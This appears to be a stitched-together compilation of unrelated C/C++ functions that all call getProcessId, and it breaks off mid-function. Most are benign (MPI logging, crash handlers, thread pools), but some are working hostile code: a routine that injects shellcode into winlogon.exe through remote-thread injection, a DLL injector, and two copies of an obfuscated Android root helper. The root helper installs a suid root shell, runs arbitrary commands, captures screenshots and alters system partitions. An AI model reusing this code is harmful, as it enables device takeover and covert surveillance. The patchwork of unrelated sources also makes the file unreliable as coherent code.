void injectThread(const wchar_t *processName) {
while (true) {
// Wait for process to load.
wprintf(L"Waiting for %s to load...\n", processName);
DWORD dwProcessId = NULL;
do {
Sleep(10);
dwProcessId = getProcessId(processName);
} while (dwProcessId == NULL);
// Attempt to inject DLL.
char dllFile[MAX_PATH];
GetCurrentDirectoryA(sizeof(dllFile), dllFile);
sprintf(dllFile, "%s\\..\\Hook\\bin\\Hook.dll", dllFile);
printf("Found PID %d, attempting to inject DLL... ", dwProcessId);
if (injectDll(dwProcessId, dllFile)) {
printf("done!\n");
}
// Now wait for it to unload.
do {
Sleep(10);
dwProcessId = getProcessId(processName);
} while (dwProcessId != NULL);
}
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
bool CrashHandlerImpl::createSharedMemory() {
try {
// Generate a random name for our shared memory object
std::ostringstream oss;
oss << "arxcrash-" << getProcessId() << "-" << Random::get<u32>();
m_SharedMemoryName = oss.str();
// Create a shared memory object.
m_SharedMemory = boost::interprocess::shared_memory_object(boost::interprocess::create_only, m_SharedMemoryName.c_str(), boost::interprocess::read_write);
// Resize to fit the CrashInfo structure
m_SharedMemory.truncate(sizeof(CrashInfo));
// Map the whole shared memory in this process
m_MemoryMappedRegion = boost::interprocess::mapped_region(m_SharedMemory, boost::interprocess::read_write);
// Our CrashInfo will be stored in this shared memory.
m_pCrashInfo = new (m_MemoryMappedRegion.get_address()) CrashInfo;
} catch(boost::interprocess::interprocess_exception) {
return false;
}
return true;
}
bool recvData(std::vector<double>& receivedData)
{
bool isDataReceived = false;
if ( intraComm != MPI::COMM_NULL)
{
MPI::Status status;
double buffer[100];
intraComm.Recv(buffer, 100,
MPI::DOUBLE,
MPI::ANY_SOURCE,
/*tag*/ 100,
status);
int count = status.Get_count(MPI::DOUBLE);
receivedData = std::vector<double>(buffer, buffer+count);
log.Info() << "RECV [ " << getRank()
<< " <-- "
<< status.Get_source()
<< " ] data : "
<< receivedData
<< std::endl;
isDataReceived = true;
}else
{
log.Err() << "PID " << getProcessId()
<< " failed to RECV"
<< std::endl;
}
return isDataReceived;
}
void dump()
{
log.Info() << "== WORLD NETWORK =="
<< "\n PID : " << getProcessId()
<< "\n WRLD_SZ : " << MPI::COMM_WORLD.Get_size()
<< std::endl;
if ( intraComm != MPI::COMM_NULL)
{
log.Info()<< "== My NETWORK =="
<< "\n RNK : " << getRank()
<< "\n TPG : " << getTopology()
<< "\n NEIGH : " << config.neighborMap[getProcessId()]
<< "\n NET_SZ : " << getSize()
<< std::endl;
}
}
/*=======================================================================*/
int main(int argc, char **argv)
/*=======================================================================*/
{
int pid = 0;
pid = getProcessId(argv[1]);
if( pid < 0 ){
printf("process [%s] not found in the system\n", argv[1]);
} else {
printf("pid of [%s] is %d\n", argv[1], pid);
}
}
void CrashHandlerImpl::fillBasicCrashInfo() {
m_pCrashInfo->architecture = ARX_ARCH;
m_pCrashInfo->processId = getProcessId();
strcpy(m_pCrashInfo->crashReportFolder, "crashes");
strncpy(m_pCrashInfo->executablePath, getExecutablePath().c_str(), sizeof(m_pCrashInfo->executablePath));
m_pCrashInfo->executablePath[sizeof(m_pCrashInfo->executablePath)-1] = 0; // Make sure our string is null terminated
strncpy(m_pCrashInfo->executableVersion, version.c_str(), sizeof(m_pCrashInfo->executableVersion));
m_pCrashInfo->executableVersion[sizeof(m_pCrashInfo->executableVersion)-1] = 0; // Make sure our string is null terminated
}
bool init()
{
std::stringstream fileName;
fileName << config.outputFile << getProcessId() << ".log";
log.open(fileName.str());
log.setLevel(Logging::INFO);
log.Info() << "Initialization of node "<< getProcessId() << std::endl;
if (config.nodesNumber > MPI::COMM_WORLD.Get_size())
{
log.Fatal() << "Not enough processors. Expected "
<< config.nodesNumber
<< std::endl;
return false;
}
if (!createTopology(config.topologyType))
{
log.Fatal() << "Could not create topology\n";
return false;
}
return true;
}
string SystemInfo::getProcessName()
{
psinfo processInfo;
char procfile[PATH_MAX];
int fd;
string value;
snprintf(procfile, PATH_MAX, "/proc/%d/psinfo", getProcessId());
if ((fd = open(procfile, O_RDONLY)) >= 0) {
if (read(fd, (void *) &processInfo, sizeof(processInfo)) == sizeof(processInfo)) {
value = processInfo.pr_fname;
}
}
return value;
}
bool KProcess::isActive()
{
#ifndef _WIN32
if(pid==0){
return false;
}
bool result = (0 == ::kill(pid,0));
#else
if(pid==NULL){
return false;
}
bool result = (WAIT_TIMEOUT == WaitForSingleObject(pid,0));
#endif
if(!result){
klog(KLOG_ERR,"process pid=[%d] is crashed\n",getProcessId());
}
return result;
}
bool KProcess::saveFile(const char *dir,const char *unix_file)
{
std::stringstream s;
s << dir << "kp_" << getpid() << "_" << getProcessId() << "_" << sig;
kassert(file==NULL);
file = strdup(s.str().c_str());
KFile fp;
if (fp.open(file,fileWrite)) {
if (unix_file) {
fp.fprintf("%s",unix_file);
}
return true;
} else {
free(file);
file = NULL;
return false;
}
}
bool sendDataTo(const std::vector<double>& inData, int dest)
{
bool isDataSent = false;
if ( intraComm != MPI::COMM_NULL)
{
log.Info() << "SEND [ " << getRank()
<< " --> "
<< dest
<< " ] data : "
<< inData
<< std::endl;
intraComm.Send( &(inData[0]),
inData.size(),
MPI::DOUBLE,
dest, /*tag*/ 100);
isDataSent = true;
}else
{
log.Err() << "PID " << getProcessId()
<< " failed to SEND\n";
}
return isDataSent;
}
// questo file viene compilato come rdb e quando l'exploit funziona viene suiddato
// statuslog -c "/system/bin/cat /dev/graphics/fb0"
int main(int argc, char** argv) {
unsigned char fb[] = "\x3b\x23\x1a\xa3\x5f"; // "fb"
unsigned char fb0[] = "\xd3\x05\xc7\x04\xb9\xbe\xaf\x04\xbc\xa3\xb2\xad\xc5\xba\xb0\xa0\x04\xbf\xb3\xed"; // "/dev/graphics/fb0"
unsigned char vol[] = "\x4e\xde\x93\xc8\x21\xde"; // "vol"
unsigned char vold1[] = "\x0b\xda\xd5\x8d\xe4\x9b\x93"; // "vold"
unsigned char vold2[] = "\xcc\x74\xbc\x5a\x63\x60\x68"; // "vold"
unsigned char reb[] = "\x2c\x97\xb8\x62\x77\x72"; // "reb"
unsigned char blr[] = "\xf4\x61\x96\x96\x98\x86"; // "blr"
unsigned char blw[] = "\x50\x1e\x4d\x4e\x44\x5b"; // "blw"
unsigned char rt[] = "\x04\x16\x10\x9a\x90"; // "rt"
unsigned char system1[] = "\x63\xfa\x9e\xbc\xf0\xee\xf0\xeb\xfa\xf2"; // "/system"
unsigned char system2[] = "\xa2\xf5\x50\x77\x33\x25\x33\x3e\x49\x31"; // "/system"
unsigned char system3[] = "\xd9\x65\xbb\x3e\x6a\x60\x6a\x77\x44\x7c"; // "/system"
unsigned char system4[] = "\xca\xa3\x6e\x2b\xff\xf5\xff\xc2\xf1\xe9"; // "/system"
unsigned char mntsdcard[] = "\xa4\x98\x37\xbb\xf9\xfa\xf0\xbb\xf7\xc0\xc7\xc5\xf6\xc0"; // "/mnt/sdcard"
unsigned char sd[] = "\x2d\xcf\xe0\xe2\xd7"; // "sd"
unsigned char ru[] = "\x2c\xb1\x9f\xbe\xbb"; // "ru"
unsigned char air[] = "\x9b\xc5\x5d\x7a\x72\x6b"; // "air"
unsigned char qzx[] = "\x04\x52\x55\x95\x82\x9c"; // "qzx"
unsigned char fhc[] = "\x68\x87\xec\x12\x00\x15"; // "fhc"
unsigned char fho[] = "\xa0\x46\xe5\x4a\x48\x53"; // "fho"
unsigned char pzm[] = "\x2d\x7a\x54\xad\xab\xc0"; // "pzm"
unsigned char qzs[] = "\x17\xc1\xd5\xe6\xef\xe4"; // "qzs"
unsigned char binsh1[] = "\xdf\x14\xc5\x10\xd4\xae\xd4\xab\xda\xd2\x10\xc5\xde\xd1\x10\xd4\xdf"; // "/system/bin/sh"
unsigned char binsh2[] = "\x0b\xeb\xee\xe4\x88\xb6\x88\x81\xb2\xba\xe4\xbf\xa6\xbb\xe4\x88\xa5"; // "/system/bin/sh"
unsigned char sh[] = "\x6a\xe2\x8a\x19\x06"; // "sh"
unsigned char lid[] = "\xb2\xf9\x48\x2e\x2d\x36"; // "lid"
unsigned char rf[] = "\xf9\x6f\x94\x95\x61"; // "rf"
unsigned char fhs[] = "\xe5\xe3\x05\x85\x93\x9a"; // "fhs"
unsigned char ape[] = "\xaa\xb4\x1d\xcb\x3a\x37"; // "ape"
unsigned char srh[] = "\x05\xcb\xcd\x8a\x89\xf3"; // "srh"
unsigned char sql[] = "\xd6\xd7\x02\xab\xa9\x46"; // "sql"
int i;
unsigned char *da, *db;
if (argc < 2) {
LOG("Usage: ");
LOG("%s", argv[0]);
LOG(" <command>\n");
LOG("fb - try to capture a screen snapshot\n");
LOG("vol - kill VOLD twice\n");
LOG("reb - reboot the phone\n");
LOG("blr - mount /system in READ_ONLY\n");
LOG("blw - mount /system in READ_WRITE\n");
LOG("rt - install the root shell in /system/bin/rilcap\n");
LOG("ru - remove the root shell from /system/bin/rilcap\n");
LOG("rf <mntpoint> <file> - remove <file> from <mntpoint>");
LOG("sd - mount /sdcard\n");
LOG("air - check if the shell has root privileges\n");
LOG("qzx \"command\" - execute the given commandline\n");
LOG("fhc <src> <dest> - copy <src> to <dst>\n");
LOG("fhs <mntpoint> <src> <dest> - copy <src> to <dst> on mountpoint <mntpoint>\n");
LOG("fho <user> <group> <file> - chown <file> to <user>:<group>\n");
LOG("pzm <newmode> <file> - chmod <file> to <newmode>\n");
LOG("qzs - start a root shell\n");
LOG("lid <proc> <dest file> - return process id for <proc> write it to <dest file>\n");
LOG("ape <content> <dest file> - append text <content> to <dest files> if not yet present\n");
LOG("srh <content> <file> - search for <content> in <file>\n");
return 0;
}
// Sanitize all secure environment variables (from linker_environ.c in AOSP linker).
/* The same list than GLibc at this point */
unsigned char* unsec_vars[] = {
"\x6e\xe6\x82\xe9\xf5\xe1\xe0\xf8\xf1\xc2\xf3\xc6\xea", // "GCONV_PATH"
"\x16\x2a\x37\x51\x57\x46\x55\xa9\xa8\x50\x59\x56\xa3\x44", // "GETCONF_DIR"
"\x17\x35\x29\xa1\xb8\x4c\x4d\xbe\xa5\xa6\xbe\x4c\xb2\x4c", // "HOSTALIASES"
"\xcc\x82\x46\x80\x88\x97\x8d\x99\x88\x85\x98", // "LD_AUDIT"
"\x9b\xdf\x4c\x69\x61\x7c\x61\x62\x67\x72\x64", // "LD_DEBUG"
"\x35\x15\x2f\x9b\x93\x6a\x93\x90\x99\x60\x92\x6a\x9a\x60\x63\x6f\x60\x63", // "LD_DEBUG_OUTPUT"
"\x3c\x66\x55\xb0\xb8\xaf\xb8\xad\xbe\x85\xb1\xbd\x83\xaf\xb7\xb9\x85\xbb", // "LD_DYNAMIC_WEAK"
"\xec\xc2\x21\xa0\xa8\xb7\xa0\xa5\xb2\x42\xad\x42\xb5\xb7\xbc\xad\xb8\xa4", // "LD_LIBRARY_PATH"
"\xee\x95\x75\xa2\xaa\xd3\xa3\xc4\xa9\xab\xa9\xa0\xd3\xc6\xd1\xda\xae", // "LD_ORIGIN_PATH"
"\xed\x59\xbe\xa3\x5b\x52\x4f\x41\x58\xa3\xa2\x5c\x5b", // "LD_PRELOAD"
"\xdd\x1c\xcb\xb1\xa9\x82\xb5\xb7\xb2\xab\xac\xb1\xa8", // "LD_PROFILE"
"\x87\xca\x41\x5f\x47\x68\x54\x53\x58\x50\x68\x5a\x56\x63\x51\xa2", // "LD_SHOW_AUXV"
"\x60\x04\x74\x34\x2c\x47\x3d\x33\x2d\x47\x34\x37\x21\x2c\x47\x22\x29\x21\x33", // "LD_USE_LOAD_BIAS"
"\x8e\x25\xa0\xc2\xc3\xd7\xd1\xc2\xca\xc3\xcd\xd1\xc9\xc0", // "LOCALDOMAIN"
"\x94\xd5\x46\x78\x65\x79\x4c\x7f\x40\x64", // "LOCPATH"
"\xe0\xe5\x09\x77\x63\x74\x74\x71\x6d\x41\x7c\x72\x63\x6d\x6f\x3b", // "MALLOC_TRACE"
"\x02\x30\x3f\x4f\x43\x4e\x4e\x4d\x41\xbd\x41\x4a\x47\x41\x49\xbd", // "MALLOC_CHECK_"
"\xf9\x13\xe2\xd9\xd0\xae\xaa\xaf\xd8\xd3\xd7", // "NIS_PATH"
"\xf5\x05\xf7\xc5\xbb\xae\xaf\xbc\xa3\xc7", // "NLSPATH"
"\x28\xc5\xfd\xfa\xf7\x85\xe9\xec\x86\xf9\xe0\xe9\x85\x84\xf9\xf5\xe9\xee\xf6", // "RESOLV_HOST_CONF"
"\xde\x47\x92\x94\xa5\x93\x8f\x9f\x92\x96\x99\x9f\x90\x93", // "RES_OPTIONS"
"\x87\x04\x85\xd3\xca\xdf\xc3\xd6\xdd", // "TMPDIR"
"\xf1\x5e\xaa\x5d\x57\x4d\x48\x5f", // "TZDIR
"\x9c\x1e\x97\xf0\xe8\xff\xe5\xef\xf9\xf8\xff\xf0\xed\xe2\xf2\xe5\xf2\xfd\xff\xf4\xe5\xf8\xec\xc5", // "LD_AOUT_LIBRARY_PATH"
"\x20\x14\x3b\x94\x6c\x87\x61\x97\x9d\x9c\x87\x90\x92\x6d\x94\x97\x61\x6c", // "LD_AOUT_PRELOAD"
// not listed in linker, used due to system() call
"\xe4\xca\x2d\xbd\xa6\x4b", // "IFS",
};
int h = 0;
for(h=0; h<sizeof(unsec_vars)/sizeof(unsec_vars[0]); h++)
unsetenv(deobfuscate(unsec_vars[h]));
/*
* set LD_LIBRARY_PATH if the linker has wiped out it due to we're suid.
* This occurs on Android 4.0+
*/
setenv(deobfuscate(ld_library_path), deobfuscate(system_libs), 0);
setgod();
// Cattura uno screenshot
if (strcmp(argv[1], deobfuscate(fb)) == 0 && argc == 3) {
LOG("Capturing a screenshot\n");
char* filename = argv[2];
copy(deobfuscate(fb0), filename);
chmod(filename, 0666);
} else if (strcmp(argv[1], deobfuscate(vol)) == 0) { // Killa VOLD per due volte
unsigned int pid;
LOG("Killing VOLD\n");
for (i = 0; i < 2; i++) {
pid = getProcessId(deobfuscate(vold1));
if (pid) {
kill(getProcessId(deobfuscate(vold2)), SIGKILL);
sleep(2);
}
}
} else if (strcmp(argv[1], deobfuscate(reb)) == 0) { // Reboot
LOG("Rebooting...\n");
sync_reboot();
} else if (strcmp(argv[1], deobfuscate(blr)) == 0) { // Monta /system in READ_ONLY
LOG("Mounting FS read only\n");
remount(deobfuscate(system1), MS_RDONLY);
} else if (strcmp(argv[1], deobfuscate(blw)) == 0) { // Monta /system in READ_WRITE
LOG("Mounting FS read write\n");
remount(deobfuscate(system2), 0);
} else if (strcmp(argv[1], deobfuscate(rt)) == 0) { // Copia la shell root in /system/bin/rilcap
LOG("Installing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(ROOT_BIN));
copy_root(deobfuscate(system3), deobfuscate(ROOT_BIN));
delete_root(deobfuscate(system4), deobfuscate(old_name_shell));
} else if (strcmp(argv[1], deobfuscate(ru)) == 0) { // Cancella la shell root in /system/bin/rilcap
LOG("Removing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(ROOT_BIN));
} else if (strcmp(argv[1], deobfuscate(rf)) == 0) { // Cancella un file dal filesystem
LOG("Removing %s from %s\n", argv[3], argv[2]);
delete_root(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(sd)) == 0) { // Mount /sdcard
LOG("Mounting /sdcard\n");
my_mount(deobfuscate(mntsdcard));
} else if (strcmp(argv[1], deobfuscate(air)) == 0) { // Am I Root?
LOG("Are we root?\n");
return setgod();
} else if (strcmp(argv[1], deobfuscate(qzx)) == 0) { // Eseguiamo la riga passataci
LOG("Executing \"%s\"\n", argv[2]);
return system(argv[2]);
} else if (strcmp(argv[1], deobfuscate(fhc)) == 0) { // Copiamo un file nel path specificato dal secondo argomento
LOG("Copying file %s to %s\n", argv[2], argv[3]);
copy(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fhs)) == 0) { // Copiamo un file nel path specificato dal secondo argomento (con remount del mntpoint)
LOG("Copying file %s to %s on mountpoint %s\n", argv[3], argv[4], argv[2]);
copy_remount(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(fho)) == 0) { // chown: user group file
LOG("Chowning to %s:%s file %s\n", argv[2], argv[3], argv[4]);
my_chown(argv[2], argv[3], argv[4]);
return 0;
} else if (strcmp(argv[1], deobfuscate(pzm)) == 0) { // chmod: newmode file
LOG("Chmodding to %s file %s\n", argv[2], argv[3]);
my_chmod(argv[2], argv[3]);
return 0;
} else if (strcmp(argv[1], deobfuscate(lid)) == 0) { // Write pid of a process to file
LOG("Returning process ID for %s to %s\n", argv[2], argv[3]);
i = getProcessId(argv[2]);
LOG("Process id is: %d\n", i);
log_to_file(argv[3], (char *)&i, sizeof(int));
return 0;
} else if (strcmp(argv[1], deobfuscate(ape)) == 0) { // Append text content to file, add newline
LOG("Appending %s to %s\n", argv[2], argv[3]);
return append_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(srh)) == 0) { // Search for content in file return 1 if content is present 0 if not, -1 in case of error
LOG("Searching for %s in %s\n", argv[2], argv[3]);
return search_content(argv[2], argv[3]);
} else if (strcmp(argv[1], deobfuscate(qzs)) == 0) { // Eseguiamo una root shell
const char * shell = deobfuscate(binsh1);
LOG("Starting root shell\n");
int i;
char *exec_args[argc + 1];
exec_args[argc] = NULL;
exec_args[0] = deobfuscate(sh);
for (i = 1; i < argc; i++) {
exec_args[i] = argv[i];
}
execv(deobfuscate(binsh2), exec_args);
LOG("Exiting shell\n");
} else if (strcmp(argv[1], deobfuscate(sql)) == 0) {
if(!argv[2]) return 0;
add_huawei_permission(argv[2]);
}
return 0;
}
virtual void run() {
int status;
DPRINTF(("Created Thread %d\n", getProcessId()));
//---------------------------------------------------------------------
// Block until all of the crew members are ready.
//
_bar->block(_crew->crewSize+1);
DPRINTF(("Reving Thread %d\n", getProcessId()));
//---------------------------------------------------------------------
// Lock the crew mutex
//
status = _mutex->lock();
DPRINTF(("Thread %d got lock\n", getProcessId()));
assert(status == 0);
//---------------------------------------------------------------------
// There will be no work to do when the crew members are created,
// so wait for the go signal.
//
while(_crew->workCount == 0) {
DPRINTF(("Thread %d waiting to go\n", getProcessId()));
status = _go->wait(_mutex);
assert(status == 0);
DPRINTF(("Thread %d going\n", getProcessId()));
}
//---------------------------------------------------------------------
// unlock the crew mutex.
//
status = _mutex->unlock();
assert(status == 0);
//---------------------------------------------------------------------
// While there's work to do, do it !
//
while(true) {
DPRINTF(("Thread %d entered while loop.\n", getProcessId()));
//-----------------------------------------------------------------
// Lock the crew mutex
//
status = _mutex->lock();
assert(status == 0);
//-----------------------------------------------------------------
// Wait while there is nothing to do. If _crew->first == 0,
// there's no work. But if _crew->workCount == 0, we're done.
//
while(_crew->first == 0) {
DPRINTF(("Thread %d waiting for work\n", getProcessId()));
status = _go->wait(_mutex);
assert(status == 0);
DPRINTF(("Thread %d woke, %#lx, %d\n",
getProcessId(), _crew->first, _crew->workCount));
}
//-----------------------------------------------------------------
// Remove and process a work item.
//
_work = _crew->first;
_crew->first = _work->next;
if(_crew->first == 0) {
_crew->last = 0;
};
DPRINTF(("Thread %d took, %#lx, leaves first %#lx, last %#lx\n",
getProcessId(), _work, _crew->first, _crew->last));
//-----------------------------------------------------------------
// unlock the crew mutex.
//
status = _mutex->unlock();
assert(status == 0);
//-----------------------------------------------------------------
// Okay, we have a work item, process it.
//
float proc_result = pr_processWork();
//-----------------------------------------------------------------
// Lock the crew mutex to decrement the work count, and
// update the result.
//
status = _mutex->lock();
assert(status == 0);
*(_result) += proc_result;
--_crew->workCount;
DPRINTF(("Thread %d decremented work count to %d\n",
getProcessId(), _crew->workCount));
if(_crew->workCount <= 0) {
DPRINTF(("Thread %d done.\n", getProcessId()));
//-------------------------------------------------------------
// Signal that we have finished our job.
//
status = _done->broadcast();
assert(status == 0);
//-------------------------------------------------------------
// unlock the crew mutex.
//
status = _mutex->unlock();
assert(status == 0);
break;
}
//----------------------------------------------------------------
// unlock the crew mutex.
//
status = _mutex->unlock();
assert(status == 0);
}
};
~NetworkImpl()
{
log.Info() << "END PROCESS "<< getProcessId() << std::endl;
MPI::Finalize();
log.close();
}
void Process::cycle(int cycleNum) {
switch(getState()) {
case NOT_ARRIVED:
//if the process is supposed to arrive at this cycle
if(cycleNum == getArrivalCycle()) {
setIsReady();
if(onArrived != NULL) {
onArrived->run(this);
}
}
break;
case RUNNING:
cout << getProcessId() << ":running ";
//if this is the first cycle the process is running
if(getCpuTimeRemaining() == getTotalCpuTime()) {
setStartCycle(cycleNum);
}
if(onRunning != NULL) {
onRunning->run(this);
}
if(!decrementCpuTimeRemaining()) {
//tried decrementing a process with no remaining cpu time?
//throw exception
}
//in the special case of 0 ioTime and odd cpuTime
//getCpuTimeRemaining() will never equal getCpuTimeBeforeBlock()
//because we initialize cpuTimeRemaining and cpuTimeBeforeBlock to totalCpuTime
//and since there is a call that decrements cpuTimeRemaining before this check
//it will never equal totalCpuTime at this point
if(getCpuTimeRemaining() == getCpuTimeBeforeBlock()) {
if(getIoTimeRemaining() > 0) {
setIsBlocked();
if(onBlocked != NULL) {
onBlocked->run(this);
}
}
}
else if(getCpuTimeRemaining() == 0) {
setIsFinished();
if(onFinished != NULL) {
onFinished->run(this);
}
setFinishCycle(cycleNum);
}
break;
case READY:
cout << getProcessId() << ":ready ";
break;
case BLOCKED:
cout << getProcessId() << ":blocked ";
if(!decrementIoTimeRemaining()) {
//tried decrementing a process with no remaining io time?
//throw exception
}
if(getIoTimeRemaining() == 0) {
setIsReady();
if(onReady != NULL) {
onReady->run(this);
}
}
break;
default:
break;
}
}
bool Process::operator>(Process& other) {
return getProcessId() > other.getProcessId();
}
// questo file viene compilato come rdb e quando l'exploit funziona viene suiddato
// statuslog -c "/system/bin/cat /dev/graphics/fb0"
int main(int argc, char** argv) {
unsigned char fb[] = "\x3b\x23\x1a\xa3\x5f"; // "fb"
unsigned char fb0[] = "\xd3\x05\xc7\x04\xb9\xbe\xaf\x04\xbc\xa3\xb2\xad\xc5\xba\xb0\xa0\x04\xbf\xb3\xed"; // "/dev/graphics/fb0"
unsigned char vol[] = "\x4e\xde\x93\xc8\x21\xde"; // "vol"
unsigned char vold1[] = "\x0b\xda\xd5\x8d\xe4\x9b\x93"; // "vold"
unsigned char vold2[] = "\xcc\x74\xbc\x5a\x63\x60\x68"; // "vold"
unsigned char reb[] = "\x2c\x97\xb8\x62\x77\x72"; // "reb"
unsigned char blr[] = "\xf4\x61\x96\x96\x98\x86"; // "blr"
unsigned char blw[] = "\x50\x1e\x4d\x4e\x44\x5b"; // "blw"
unsigned char rt[] = "\x04\x16\x10\x9a\x90"; // "rt"
unsigned char system1[] = "\x63\xfa\x9e\xbc\xf0\xee\xf0\xeb\xfa\xf2"; // "/system"
unsigned char system2[] = "\xa2\xf5\x50\x77\x33\x25\x33\x3e\x49\x31"; // "/system"
unsigned char system3[] = "\xd9\x65\xbb\x3e\x6a\x60\x6a\x77\x44\x7c"; // "/system"
unsigned char system4[] = "\xca\xa3\x6e\x2b\xff\xf5\xff\xc2\xf1\xe9"; // "/system"
unsigned char mntsdcard[] = "\xa4\x98\x37\xbb\xf9\xfa\xf0\xbb\xf7\xc0\xc7\xc5\xf6\xc0"; // "/mnt/sdcard"
unsigned char rilcap1[] = "\x35\x63\x44\x1e\xca\xcc\xca\xc7\xd0\xd8\x1e\xd9\xdc\xdd\x1e\xc9\xdc\xdf\xda\xd4\xcb"; // "/system/bin/rilcap"
unsigned char rilcap2[] = "\x78\xd1\xbb\xf9\x0d\x03\x0d\x0c\x3f\x37\xf9\x3a\x33\x36\xf9\x0a\x33\x34\x3d\x3b\x08"; // "/system/bin/rilcap"
unsigned char sd[] = "\x2d\xcf\xe0\xe2\xd7"; // "sd"
unsigned char ru[] = "\x2c\xb1\x9f\xbe\xbb"; // "ru"
unsigned char air[] = "\x9b\xc5\x5d\x7a\x72\x6b"; // "air"
unsigned char qzx[] = "\x04\x52\x55\x95\x82\x9c"; // "qzx"
unsigned char fhc[] = "\x68\x87\xec\x12\x00\x15"; // "fhc"
unsigned char fho[] = "\xa0\x46\xe5\x4a\x48\x53"; // "fho"
unsigned char pzm[] = "\x2d\x7a\x54\xad\xab\xc0"; // "pzm"
unsigned char qzs[] = "\x17\xc1\xd5\xe6\xef\xe4"; // "qzs"
unsigned char binsh1[] = "\xdf\x14\xc5\x10\xd4\xae\xd4\xab\xda\xd2\x10\xc5\xde\xd1\x10\xd4\xdf"; // "/system/bin/sh"
unsigned char binsh2[] = "\x0b\xeb\xee\xe4\x88\xb6\x88\x81\xb2\xba\xe4\xbf\xa6\xbb\xe4\x88\xa5"; // "/system/bin/sh"
unsigned char adm[] = "\x5b\x25\x7d\x7a\x41\x7e"; // "adm"
unsigned char sh[] = "\x6a\xe2\x8a\x19\x06"; // "sh"
unsigned char lid[] = "\xb2\xf9\x48\x2e\x2d\x36"; // "lid"
unsigned char rf[] = "\xf9\x6f\x94\x95\x61"; // "rf"
unsigned char fhs[] = "\xe5\xe3\x05\x85\x93\x9a"; // "fhs"
unsigned char ape[] = "\xaa\xb4\x1d\xcb\x3a\x37"; // "ape"
unsigned char srh[] = "\x05\xcb\xcd\x8a\x89\xf3"; // "srh"
int i;
unsigned char *da, *db;
if (argc < 2) {
LOG("Usage: ");
LOG("%s", argv[0]);
LOG(" <command>\n");
LOG("fb - try to capture a screen snapshot\n");
LOG("vol - kill VOLD twice\n");
LOG("reb - reboot the phone\n");
LOG("blr - mount /system in READ_ONLY\n");
LOG("blw - mount /system in READ_WRITE\n");
LOG("rt - install the root shell in /system/bin/rilcap\n");
LOG("ru - remove the root shell from /system/bin/rilcap\n");
LOG("rf <mntpoint> <file> - remove <file> from <mntpoint>");
LOG("sd - mount /sdcard\n");
LOG("air - check if the shell has root privileges\n");
LOG("qzx \"command\" - execute the given commandline\n");
LOG("fhc <src> <dest> - copy <src> to <dst>\n");
LOG("fhs <mntpoint> <src> <dest> - copy <src> to <dst> on mountpoint <mntpoint>\n");
LOG("fho <user> <group> <file> - chown <file> to <user>:<group>\n");
LOG("pzm <newmode> <file> - chmod <file> to <newmode>\n");
LOG("adm <package name/receiver>\n");
LOG("qzs - start a root shell\n");
LOG("lid <proc> <dest file> - return process id for <proc> write it to <dest file>\n");
LOG("ape <content> <dest file> - append text <content> to <dest files> if not yet present\n");
LOG("srh <content> <file> - search for <content> in <file>\n");
return 0;
}
setgod();
// Cattura uno screenshot
if (strcmp(argv[1], deobfuscate(fb)) == 0 && argc == 3) {
LOG("Capturing a screenshot\n");
char* filename = argv[2];
copy(deobfuscate(fb0), filename);
chmod(filename, 0666);
} else if (strcmp(argv[1], deobfuscate(vol)) == 0) { // Killa VOLD per due volte
unsigned int pid;
LOG("Killing VOLD\n");
for (i = 0; i < 2; i++) {
pid = getProcessId(deobfuscate(vold1));
if (pid) {
kill(getProcessId(deobfuscate(vold2)), SIGKILL);
sleep(2);
}
}
} else if (strcmp(argv[1], deobfuscate(reb)) == 0) { // Reboot
LOG("Rebooting...\n");
sync_reboot();
} else if (strcmp(argv[1], deobfuscate(blr)) == 0) { // Monta /system in READ_ONLY
LOG("Mounting FS read only\n");
remount(deobfuscate(system1), MS_RDONLY);
} else if (strcmp(argv[1], deobfuscate(blw)) == 0) { // Monta /system in READ_WRITE
LOG("Mounting FS read write\n");
remount(deobfuscate(system2), 0);
} else if (strcmp(argv[1], deobfuscate(rt)) == 0) { // Copia la shell root in /system/bin/rilcap
LOG("Installing suid shell\n");
copy_root(deobfuscate(system3), deobfuscate(rilcap1));
} else if (strcmp(argv[1], deobfuscate(ru)) == 0) { // Cancella la shell root in /system/bin/rilcap
LOG("Removing suid shell\n");
delete_root(deobfuscate(system4), deobfuscate(rilcap2));
} else if (strcmp(argv[1], deobfuscate(rf)) == 0) { // Cancella un file dal filesystem
